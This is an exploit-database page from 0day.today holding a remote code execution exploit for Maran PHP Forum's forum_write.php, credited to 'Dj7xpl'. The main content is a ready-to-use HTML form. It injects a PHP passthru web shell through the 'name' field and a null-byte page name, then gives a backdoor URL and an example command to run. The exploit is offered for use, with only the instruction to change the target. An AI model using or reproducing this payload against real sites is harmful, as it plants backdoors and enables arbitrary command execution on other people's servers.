[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Maran PHP Forum (forum_write.php) Remote Code Execution Vulnerability

Author
Dj7xpl
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1786
Category
web applications
Date add
21-04-2007
Platform
unsorted
=====================================================================
Maran PHP Forum (forum_write.php) Remote Code Execution Vulnerability
=====================================================================



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+                                               Y! Underground Group                                               +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Portal......:  Maran PHP Forum                                                                          +                                                            +
+          Type........:  Remote Code Execution                                                                    +
+          Download....:  http://www.maran.pamil-visions.com/maranforum.php                                        +                                                                 +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Xpl.........:                                                                                           +
+  <html><head><Title>---===Maran PHP Forum===------===Dj7xpl===---</title></head>                                 +
+  <body bgcolor="red">                                                                                            +
+  <center>                                                                                                        +
+  <form name="AimStats" method="post" action="http://site.com/path to site/forum_write.php">                      +
+  <input name="name" value="<?passthru($_GET[cmd])?>" type="text" >                                               +
+  <input name="page" value="pagename.php%00" type="text" >                                                        +
+  <input type="submit" name="Submit" value="Submit" >                                                             +
+  </form><br><br>                                                                                                 +
+  <font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font><br>                            +
+  <font color="#C0FF3E" size="+1"> Backdoor : http://[Target]/[Path]/data/pagename.php?cmd=shell</font></br>      +
+  <font color="#C0FF3E" size="+1"> E.g  :  http://site.com/forum/data/filename.php?cmd=ls -la</font>              +
+  </center>                                                                                                       +
+  </body>                                                                                                         +
+  </html>                                                                                                         +
+                                                                                                                  +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



#  0day.today [2024-12-25]  #